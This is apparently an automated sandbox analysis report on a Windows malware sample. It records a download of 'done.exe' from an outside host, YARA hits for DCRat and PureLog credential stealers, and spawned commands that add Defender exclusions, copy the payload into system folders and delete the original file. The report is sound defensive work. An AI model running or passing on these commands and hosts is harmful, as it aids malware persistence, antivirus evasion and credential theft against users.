                                                                                          Data Raw: 39 38 0d 0a 01 11 25 5f 23 07 30 02 26 23 0e 55 2e 32 2f 13 32 2e 3f 44 2b 22 2a 1b 25 3b 28 05 2e 54 3f 55 2a 2e 39 59 3f 3a 3b 0f 3f 2f 27 1f 24 25 21 46 0c 1d 27 07 30 15 0f 01 33 04 3b 5d 27 3f 01 1d 24 32 19 58 3d 30 27 0b 37 1d 33 5e 30 1d 3f 0e 3b 5b 35 08 38 1b 21 1a 2a 31 32 57 32 28 22 57 0d 12 24 0d 24 30 0f 12 34 32 0c 1c 22 0f 34 54 2b 43 20 5b 27 10 27 1f 35 14 39 5d 27 22 28 12 34 0e 2b 02 3f 05 00 10 26 04 22 53 30 01 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98%_#0&#U.2/2.?D+"*%;(.T?U*.9Y?:;?/'$%!F'03;]'?$2X=0'73^0?;[58!*12W2("W$$042"4T+C [''59]'"(4+?&"S0 ^*+U?WT0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.8  49706        91.149.219.45   443               7520  C:\Users\user\Desktop\Wh2c6sgwRo.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-10 06:27:49 UTC  73                 OUT        GET /done.exe HTTP/1.1
                                                                                          Host: dragonhack.shop
                                                                                          Connection: Keep-Alive
2024-12-10 06:27:50 UTC  280                IN         HTTP/1.1 200 OK
                                                                                          Date: Tue, 10 Dec 2024 06:27:59 GMT
                                                                                          Server: Apache/2
                                                                                          Upgrade: h2,h2c
                                                                                          Connection: Upgrade, close
                                                                                          Last-Modified: Sun, 08 Dec 2024 03:03:01 GMT
                                                                                          ETag: "dca00-628b97c6a9ed8"
                                                                                          Accept-Ranges: bytes
                                                                                          Content-Length: 903680
                                                                                          Content-Type: application/x-msdownload
                                                                                          Data Ascii: ((oXs~+*0((o+*0((o+*0[O|(l|((`({o,{o+{o+*0%{(:(+*0



                                                                                          Target ID:0
                                                                                          Start time:01:27:38
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Users\user\Desktop\Wh2c6sgwRo.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\user\Desktop\Wh2c6sgwRo.exe"
                                                                                          Imagebase:0x1905ff00000
                                                                                          File size:400'384 bytes
                                                                                          MD5 hash:43D30C776F593EFDF5416AB4142442D6
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1418594888.000001905FF02000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:2
                                                                                          Start time:01:27:51
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe"
                                                                                          Imagebase:0xcf0000
                                                                                          File size:903'680 bytes
                                                                                          MD5 hash:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000002.00000000.1547271116.0000000000CF2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 75%, ReversingLabs
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:3
                                                                                          Start time:01:27:51
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Wh2c6sgwRo.exe"
                                                                                          Imagebase:0x7ff71c6d0000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:4
                                                                                          Start time:01:27:51
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6ee680000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:5
                                                                                          Start time:01:27:51
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\choice.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:choice /C Y /N /D Y /T 3
                                                                                          Imagebase:0x7ff6a2940000
                                                                                          File size:35'840 bytes
                                                                                          MD5 hash:1A9804F0C374283B094E9E55DC5EE128
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          Target ID:9
                                                                                          Start time:01:27:54
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.cmdline"
                                                                                          Imagebase:0x7ff654610000
                                                                                          File size:2'759'232 bytes
                                                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          Target ID:10
                                                                                          Start time:01:27:54
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6ee680000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:11
                                                                                          Start time:01:27:54
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES459B.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCA62F8F92906C4C64B352C63DFBD9F59.TMP"
                                                                                          Imagebase:0x7ff7ae190000
                                                                                          File size:52'744 bytes
                                                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:13
                                                                                          Start time:01:27:55
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrf14fw5\zrf14fw5.cmdline"
                                                                                          Imagebase:0x7ff654610000
                                                                                          File size:2'759'232 bytes
                                                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          Target ID:14
                                                                                          Start time:01:27:55
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6ee680000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:15
                                                                                          Start time:01:27:55
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4770.tmp" "c:\Windows\System32\CSC533681BDB06443E789816E6615DEB19.TMP"
                                                                                          Imagebase:0x7ff7ae190000
                                                                                          File size:52'744 bytes
                                                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:27
                                                                                          Start time:01:27:56
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Imagebase:0x200000
                                                                                          File size:903'680 bytes
                                                                                          MD5 hash:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Antivirus matches:
                                                                                          • Detection: 75%, ReversingLabs
                                                                                          Has exited:false

                                                                                          Target ID:29
                                                                                          Start time:01:27:57
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe'
                                                                                          Imagebase:0x7ff6cb6b0000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:30
                                                                                          Start time:01:27:57
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                                                                          Imagebase:0xb60000
                                                                                          File size:903'680 bytes
                                                                                          MD5 hash:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Antivirus matches:
                                                                                          • Detection: 75%, ReversingLabs
                                                                                          Has exited:true

                                                                                          Target ID:31
                                                                                          Start time:01:27:57
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Help\Corporate\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'
                                                                                          Imagebase:0x7ff6cb6b0000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:32
                                                                                          Start time:01:27:57
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6ee680000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:33
                                                                                          Start time:01:27:57
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'
                                                                                          Imagebase:0x7ff6cb6b0000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:34
                                                                                          Start time:01:27:57
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6ee680000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:35
                                                                                          Start time:01:27:57
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'
                                                                                          Imagebase:0x7ff6cb6b0000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:36
                                                                                          Start time:01:27:57
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6ee680000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:37
                                                                                          Start time:01:27:57
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\ProgramData\fontdrvhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\All Users\fontdrvhost.exe"
                                                                                          Imagebase:0x2e0000
                                                                                          File size:903'680 bytes
                                                                                          MD5 hash:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\ProgramData\fontdrvhost.exe, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 75%, ReversingLabs
                                                                                          Has exited:true

                                                                                          Target ID:38
                                                                                          Start time:01:27:57
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'
                                                                                          Imagebase:0x7ff6cb6b0000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:39
                                                                                          Start time:01:27:57
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6ee680000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:40
                                                                                          Start time:01:27:57
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6ee680000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:41
                                                                                          Start time:01:27:57
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\ProgramData\fontdrvhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\All Users\fontdrvhost.exe"
                                                                                          Imagebase:0xcc0000
                                                                                          File size:903'680 bytes
                                                                                          MD5 hash:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:42
                                                                                          Start time:01:27:58
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dmMZ8RlPbE.bat"
                                                                                          Imagebase:0x7ff6ee680000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:43
                                                                                          Start time:01:27:58
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6ee680000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:44
                                                                                          Start time:01:27:58
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\chcp.com
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:chcp 65001
                                                                                          Imagebase:0x7ff744bb0000
                                                                                          File size:14'848 bytes
                                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:45
                                                                                          Start time:01:28:00
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\PING.EXE
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:ping -n 10 localhost
                                                                                          Imagebase:0x7ff658d30000
                                                                                          File size:22'528 bytes
                                                                                          MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:46
                                                                                          Start time:01:28:07
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                          Imagebase:0x7ff605670000
                                                                                          File size:496'640 bytes
                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:47
                                                                                          Start time:01:28:08
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\ProgramData\fontdrvhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\All Users\fontdrvhost.exe"
                                                                                          Imagebase:0x820000
                                                                                          File size:903'680 bytes
                                                                                          MD5 hash:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:48
                                                                                          Start time:01:28:10
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                                                                          Imagebase:0x90000
                                                                                          File size:903'680 bytes
                                                                                          MD5 hash:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:49
                                                                                          Start time:01:28:14
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                          Imagebase:0x7ff67e6d0000
                                                                                          File size:55'320 bytes
                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:50
                                                                                          Start time:01:28:17
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                                                                          Imagebase:0x750000
                                                                                          File size:903'680 bytes
                                                                                          MD5 hash:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:53
                                                                                          Start time:01:28:25
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\ProgramData\fontdrvhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\All Users\fontdrvhost.exe"
                                                                                          Imagebase:0xd50000
                                                                                          File size:903'680 bytes
                                                                                          MD5 hash:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:54
                                                                                          Start time:01:28:33
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                                                                          Imagebase:0x190000
                                                                                          File size:903'680 bytes
                                                                                          MD5 hash:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:55
                                                                                          Start time:01:28:42
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\ProgramData\fontdrvhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\All Users\fontdrvhost.exe"
                                                                                          Imagebase:0xc50000
                                                                                          File size:903'680 bytes
                                                                                          MD5 hash:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:56
                                                                                          Start time:01:28:50
                                                                                          Start date:10/12/2024
                                                                                          Path:C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                                                                          Imagebase:0x290000
                                                                                          File size:903'680 bytes
                                                                                          MD5 hash:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            • Instruction Fuzzy Hash: 09A10C71B1890D8FDBA8FB6CC454A6877E2FF98315F1541B9D11ECB2A1DA25AC42CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5e3d6b8f428141a563131987cfab7fb61995c7ecf45470ed85d9c0dfe5c24691
                                                                                            • Instruction ID: fe2ebed6e929c74f80b33fbf73f231b9308a2587506a4953e2c7c408e0ce53a3
                                                                                            • Opcode Fuzzy Hash: 5e3d6b8f428141a563131987cfab7fb61995c7ecf45470ed85d9c0dfe5c24691
                                                                                            • Instruction Fuzzy Hash: 6E5104B1A0D68D8FE756FF78C8566E97FE0EF56360F0440BED04ECB2A2DA2858458740
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d0dd46ac6e904b5208841702b4a52fd2e2e60dc61d69fe4d3daad35caa1e372c
                                                                                            • Instruction ID: 1fe94eac5e3d7d301878fd09f083ae9ee881c8fb92fec09c1b1e1bf0281ad0b4
                                                                                            • Opcode Fuzzy Hash: d0dd46ac6e904b5208841702b4a52fd2e2e60dc61d69fe4d3daad35caa1e372c
                                                                                            • Instruction Fuzzy Hash: E04114B1A0DA4D4FE769BFB8C0562B97BE0EF55310B1454BEC58FC71A3DD1858528740
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7ac0f95d650e3c8cdb94808ef1c59c317020e6be8849af3c5bd73931ad2d1dc3
                                                                                            • Instruction ID: 32ba953b37a2a9645ebe7a1bc7491769e7b2cdbc16798f90c8470bd39088bc3b
                                                                                            • Opcode Fuzzy Hash: 7ac0f95d650e3c8cdb94808ef1c59c317020e6be8849af3c5bd73931ad2d1dc3
